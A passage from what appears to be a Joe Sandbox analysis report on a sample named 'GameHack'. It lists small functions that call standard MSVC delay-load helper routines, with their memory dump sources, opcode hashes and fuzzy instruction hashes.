                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: dbbc7f1ed09e9632a7adbe1ef20afea48a40f9c73a29818c8b34c39198fa8e1d
                                      • Instruction ID: 2381d139ad0871a1480231edefeadc0c15291995cd2a2e92b5db82ea7b1015ea
                                      • Opcode Fuzzy Hash: dbbc7f1ed09e9632a7adbe1ef20afea48a40f9c73a29818c8b34c39198fa8e1d
                                      • Instruction Fuzzy Hash: 40B012A536C5456C714CB10AAD02D7E026CC1C4B60330951AF509F02C2D5809C04B032
                                      Function 00EEDC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 86bce9911f21dfd8a040a3294a3bfced4802977e96f6121c86d904947914ba34
                                      • Instruction ID: b374052fbeb6e59d25a7476cc2dab12eb1b0c1320b7bed0e2b7fc14f9517ccbe
                                      • Opcode Fuzzy Hash: 86bce9911f21dfd8a040a3294a3bfced4802977e96f6121c86d904947914ba34
                                      • Instruction Fuzzy Hash: DAB012A536C6497C714C7106BF02C7E422CC2C0B60330561AF105F01C295C09C44B032
                                      Function 00EED8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7971176ce10af75c5f28294827e992fda19072f9ec7dc2dcb4cafdc11f72161a
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 7971176ce10af75c5f28294827e992fda19072f9ec7dc2dcb4cafdc11f72161a
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c35fa3753dbb0c291041631e32d58d0fd5decb90e0525fa9cf00400cc7621a26
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: c35fa3753dbb0c291041631e32d58d0fd5decb90e0525fa9cf00400cc7621a26
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 2c65a7b420a0a29a65f412612d27749044005e438e8e6cb5b9be3d0f196a5203
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 2c65a7b420a0a29a65f412612d27749044005e438e8e6cb5b9be3d0f196a5203
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 779e98fc97900f126cbc9887b727e032c0495331738edf19136fd21c2de648be
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 779e98fc97900f126cbc9887b727e032c0495331738edf19136fd21c2de648be
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8c6a2931a462748382ba6fc476376932586e0f41f24edf878ea1b91d79f37d67
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 8c6a2931a462748382ba6fc476376932586e0f41f24edf878ea1b91d79f37d67
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: d09e1ab7327670adf268f20be0ccee5e26eff1bc90408b43a18b6e8f33e59e7e
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: d09e1ab7327670adf268f20be0ccee5e26eff1bc90408b43a18b6e8f33e59e7e
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4b3095be0e9589002abaa4d9c8cf0a463046617677c38df8a41a6ee2e29bf2fb
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 4b3095be0e9589002abaa4d9c8cf0a463046617677c38df8a41a6ee2e29bf2fb
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 01858a4ae65d138a3b3ea6774eee0588d3ae0f90098a71e0975bcf466200cd91
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 01858a4ae65d138a3b3ea6774eee0588d3ae0f90098a71e0975bcf466200cd91
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b773223d614b7f3b2cff9fd002424ab00c2a5925a6bc3340c039b0c461fb9838
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: b773223d614b7f3b2cff9fd002424ab00c2a5925a6bc3340c039b0c461fb9838
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4b835f12f557381d4b7550344de4363bfc0a1b6ccfab983308eb9d3e28870e03
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 4b835f12f557381d4b7550344de4363bfc0a1b6ccfab983308eb9d3e28870e03
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EED91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 26dc10dbdb328637c489b25b82b812e0460d0eabda3530d4baae3a8874784775
                                      • Instruction ID: b2795629e7d6277751d8ec9a5d301c3efd49fd7da6020beb0b2fd20e7fdb6806
                                      • Opcode Fuzzy Hash: 26dc10dbdb328637c489b25b82b812e0460d0eabda3530d4baae3a8874784775
                                      • Instruction Fuzzy Hash: B0A0129126D4477C300C61026C16C36020CC4C0B103305409B00AB00C094405C056431
                                      Function 00EEDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4a1c9cce2797602b2b0769dafe7e54b2515d61e8ed09970b896499ccdf125e25
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 4a1c9cce2797602b2b0769dafe7e54b2515d61e8ed09970b896499ccdf125e25
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      Function 00EEDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7e23e80382c7a87e0e307219d2c019b958344f61cdb48325a152e56064365a6a
                                      • Instruction ID: 920f96df3f8919d01b69327d543cc58fa0bcbcc744f17f670e3b5c7b33cc7b5d
                                      • Opcode Fuzzy Hash: 7e23e80382c7a87e0e307219d2c019b958344f61cdb48325a152e56064365a6a
                                      • Instruction Fuzzy Hash: 8DA0129126D0467C300871036C02C7A024CC0C0B10330551AF00AA008454404C046431
                                      Function 00EEDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
